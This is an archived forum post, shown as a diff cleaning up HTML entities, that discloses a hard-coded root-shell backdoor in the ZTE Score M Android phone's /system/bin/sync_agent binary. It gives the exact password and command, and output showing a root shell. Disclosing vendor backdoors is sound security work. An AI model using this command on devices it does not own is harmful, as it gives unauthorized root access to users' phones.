PHX2600/The-Archive/forum/General Discussion/1603 - ZTE Score M default backdoor.md

 Contents of the paste:

-[code:3gdsead2]The ZTE Score M is an Android 2&#46;3&#46;4 (Gingerbread) phone available in the United States on MetroPCS, made by Chinese telecom ZTE Corporation&#46;
+[code:3gdsead2]The ZTE Score M is an Android 2.3.4 (Gingerbread) phone available in the United States on MetroPCS, made by Chinese telecom ZTE Corporation.

-There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device&#46;  Just give the magic, hard-coded password to get a root shell&#58;
+There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device.
+Just give the magic, hard-coded password to get a root shell:

 $ sync_agent ztex1609523
 # id
 uid=0(root) gid=0(root)

-Nice backdoor, ZTE&#46;[/code:3gdsead2]
+Nice backdoor, ZTE.[/code:3gdsead2]

 --------------------------------------------------------------------------------